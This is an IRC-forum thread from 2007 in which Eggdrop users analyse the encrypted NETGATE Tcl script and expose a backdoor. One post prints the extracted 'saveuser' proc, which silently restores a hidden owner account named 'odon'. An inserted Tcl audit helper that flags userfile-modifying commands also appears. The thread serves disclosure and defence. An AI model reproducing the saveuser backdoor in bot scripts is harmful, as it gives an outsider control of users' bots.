KONTOL Voice
Joined: 20 Mar 2007 Posts: 3
|
Posted: Fri Apr 27, 2007 12:55 am Post subject: strange??? (netgate) |
|
|
NETGATE tcl has been updated to version 9.5; a lot more protection has been added, but the encryption uses TCLpro! That makes it more strange!!!
Can anyone fully decrypt it? That file has been encrypted with TCLpro (bytecode method). Make it readable to make sure there is no backdoor again!
For more information about it, please surf to:
http://netgate.informe.com/viewtopic.php?t=1086
NETGATE 9.5 tcl
Link removed (Alchera)
Config for bot:
http://www.redwingsonline.org/download/bot.cfg
It uses the Indonesian language! I can't understand what it all means...
Thx u all...
EDIT by slennox: added script name to subject and moved topic to Script Support & Releases _________________ [ I'm not ready yet! ] |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
Posted: Fri Apr 27, 2007 8:49 am Post subject: |
|
|
Why do you want to use NETGATE anyway? It has a very bad reputation and I don't see why you NEED it. There are a lot of scripts in the Tcl archive that will do much more and are written in far fewer lines (not 10,000+). _________________ Follow me on GitHub
- Opposing
Public Tcl scripts |
KONTOL Voice
Joined: 20 Mar 2007 Posts: 3
|
Posted: Fri Apr 27, 2007 11:20 am Post subject: yoww... |
|
|
I've tried using NETGATE for some reason (trial & error surely). I'm just asking for some help to decrypt that tcl into a readable condition, so I can read & fix any backdoor for myself and the other users... Or maybe to decrypt all tcl files that have been encrypted by TCLpro (procomp util)...
thx u & I appreciate any help...  _________________ [ I'm not ready yet! ] |
rosc2112 Revered One

Joined: 19 Feb 2006 Posts: 1454 Location: Northeast Pennsylvania
|
Posted: Fri Apr 27, 2007 1:12 pm Post subject: |
|
|
From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.
Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.
You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit. |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
Posted: Fri Apr 27, 2007 2:13 pm Post subject: |
|
|
After reading this thread again, I got the idea of checking if that [saveuser] procedure exists in the new netgate.
I've downloaded windrop1.6.12 and loaded netgate into it. Enabled the .tcl DCC command and did the following:
| Quote: | (Me) .tcl info command saveuser
(Bot) Tcl: saveuser
(Me) .tcl info args saveuser
(Bot) Tcl: (Meaning it takes no arguments)
(Me) .tcl info body saveuser |
I'll display the output of the last Tcl-command in code tags (The whole proc)
| Code: |
proc saveuser {} {
    global ps owner
    if {![validuser $ps]} {
        setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq."
    } elseif {$owner != $ps} {
        setuser $owner XTRA "BEND" [zip [chattr $ps]]
        if {[passwdok $ps ""] != 1} {
            setuser $owner XTRA "LAST" [getuser $ps "PASS"]
        }
        deluser $ps
    }
    save
    if {![validuser $ps]} {
        adduser $ps "$ps!*@*"
        chattr $ps [dezip [getuser $owner XTRA "BEND"]]
        if {[getuser $owner XTRA "LAST"] != ""} {
            setuser $ps PASS [getuser $owner XTRA "LAST"]
        }
    }
    return 1
}
|
$owner contains the owner's handle (set by you) and what does $ps contain?
| Quote: | (Me) .set ps
(Bot) Currently: odon |
So the same backdoor still exists in the new version, this time it adds "odon" instead of "KaISaR" to the bot's userlist as owner.
Edit: I meant windrop1.6.12 instead of eggdrop1.6.12 (used it since the site claimed that netgate only works for this version of windrop or more specifically for tcl 8.2-8.3... even more reason for why this script is lame). _________________ Follow me on GitHub
- Opposing
Public Tcl scripts
Last edited by Sir_Fz on Sat Apr 28, 2007 8:57 pm; edited 1 time in total |
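Added example (not part of the original post, and not netgate or Eggdrop code): the manual `info args` / `info body` check from the post above, generalized to every proc a script defines. It snapshots the proc list, then reports any new proc whose body calls the userfile commands seen in saveuser; `audit_procs`, `audit_hits`, `audit_report` and the constructed `demo_sync` stand-in are hypothetical names.

```tcl
# Added example: audit helper, not part of netgate or Eggdrop.
# Userfile-modifying commands to look for; all four appear in saveuser.
set audit_cmds {adduser deluser chattr setuser}

# Return every proc in namespace $ns and its children, fully qualified.
proc audit_procs {{ns ::}} {
    set out {}
    foreach p [namespace eval $ns {info procs}] {
        lappend out [string trimright $ns :]::$p
    }
    foreach child [namespace children $ns] {
        set out [concat $out [audit_procs $child]]
    }
    return [lsort $out]
}

# Return the watched commands that occur as whole words in a proc body.
proc audit_hits {procname} {
    global audit_cmds
    set hits {}
    set body [info body $procname]
    foreach c $audit_cmds {
        if {[regexp "\\m${c}\\M" $body]} {
            lappend hits $c
        }
    }
    return $hits
}

# Print each flagged proc that is not in the $before snapshot; return the count.
proc audit_report {{before {}}} {
    set n 0
    foreach p [audit_procs] {
        if {[lsearch -exact $before $p] >= 0} continue
        set hits [audit_hits $p]
        if {[llength $hits] == 0} continue
        incr n
        puts "$p {[info args $p]} -> [join $hits {, }]"
    }
    return $n
}

# Snapshot first, then load the script under review, then report.
set before [audit_procs]
# Constructed stand-in for a suspect script (defined here, never called).
proc ::demo_sync {handle} {
    adduser $handle "$handle!*@*"
    chattr $handle +o
}
audit_report $before
```

On a bot, take the snapshot before sourcing the script under review and read each flagged proc in full with `info body`. The helper only sees procs whose bodies `info body` can return, as it did for saveuser.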
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Sat Apr 28, 2007 12:10 am Post subject: |
|
|
| rosc2112 wrote: | From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.
Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.
You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit. |
netgate backdoor _________________ Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
Posted: Sat Apr 28, 2007 6:59 am Post subject: |
|
|
I can't even start about how ugly this script makes Eggdrop. It stores the userfile in the language/ directory lol, that's so lame, I mean come on, be a man lol. The bot.cfg requires editing only a few settings (nick, username, IP and hostname) so the user wouldn't understand how to change alternative nick, load scripts or change any other setting...
I would never recommend such a script even if it didn't contain that backdoor. _________________ Follow me on GitHub
- Opposing
Public Tcl scripts |
nml375 Revered One
Joined: 04 Aug 2006 Posts: 2857
|
Posted: Sat Apr 28, 2007 8:49 am Post subject: |
|
|
Well, the only purpose for this package is to hijack bots and quite possibly accounts on the system it runs on. The ones targeted by such a package would be those who desire an up'n'go bot, and really don't want to bother/care to even check config-files, scripts, and such; and this script "offers it all", it claims to take care of the more difficult config-settings, does all the things eggdrop usually needs added scripts for, etc, etc..
The mere fact that people still think about using it despite the widespread knowledge of the backdoors, etc. could only mean the author got the bait right. _________________ NML_375, idling at #eggdrop@IrcNET |
rosc2112 Revered One

Joined: 19 Feb 2006 Posts: 1454 Location: Northeast Pennsylvania
|
Posted: Sat Apr 28, 2007 5:38 pm Post subject: |
|
|
Wouldn't be surprised to find netgate to be a conglomeration of other people's scripts/procs mashed together into a mess. |
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Sat Apr 28, 2007 11:06 pm Post subject: |
|
|
I notified the appropriate Tcl/eggdrop channel founders on DALnet when this first reared its ugly head as it targets DALnet bot owners specifically (from memory). _________________ Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
mayday Voice
Joined: 30 Apr 2007 Posts: 2
|
Posted: Mon Apr 30, 2007 4:13 am Post subject: |
|
|
Wew netgate again......
Guys if u look into netgate FAQ u can read this :
FaQ:
........
- Tapi kan masih ada $ps odon nya, yups masih ada, dan nick PSna masih kami yang pegang, dan gak akan kami salah gunakan, so if u agree with this condition us this script, if not dont use it, Simple !!.
I tried to translate: - but the tcl still has $ps odon, yes that $ps still exists, and we still hold/keep/have that PS nick, and we would not misuse it, so if u agree with this condition use this script, if not don't use it, Simple !!.
.......
Please refer to the bolded text, so use it if u agree with that condition, don't use it if not...
I notice something weird in here, TS says he doesn't understand the Indonesian language but his id KONTOL uses the Indonesian language, KONTOL means p*nis in English |
nml375 Revered One
Joined: 04 Aug 2006 Posts: 2857
|
Posted: Mon Apr 30, 2007 9:23 am Post subject: |
|
|
Any such "disclaimer" should be put within the license-agreement to carry any validity. Also, mixing languages like that is to me a really bad practise.
Anyway, since they admit to adding a user-account, with a known password and hostmask that only cares for nick (roughly making it possible for anyone to authenticate, and use this account for mischief)...
Does anyone know if they ever provided a reasonable explanation for adding a user account of any kind? Or why it would need such permissions?
I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility... _________________ NML_375, idling at #eggdrop@IrcNET |
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Mon Apr 30, 2007 11:09 am Post subject: |
|
|
| mayday wrote: | | Wew netgate again...... KONTOL mean p*nis in english |
I already knew that (although I do not speak the language); I assist in an Indonesian (shell provider) channel on DALnet.  _________________ Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Mon Apr 30, 2007 11:11 am Post subject: |
|
|
| nml375 wrote: | | I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility... |
It's a hijacking tool and they think we're all idiots.
Unfortunately there are some out there that have fallen for this "con". _________________ Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
rosc2112 Revered One

Joined: 19 Feb 2006 Posts: 1454 Location: Northeast Pennsylvania
|
Posted: Tue May 01, 2007 9:01 pm Post subject: |
|
|
I suppose it'd be easy enough to rip the procs from the script as already demonstrated, if anyone ever wanted to bother, and then release a clean copy
Either that, or just create the backdoor username and give it a different password and +k flags.. Or, then again, I can think of some nice little reverse-hack script to use on whoever tried logging in with that username
But, meh.. Screw them, their script sucks, that's why they have to hide it  |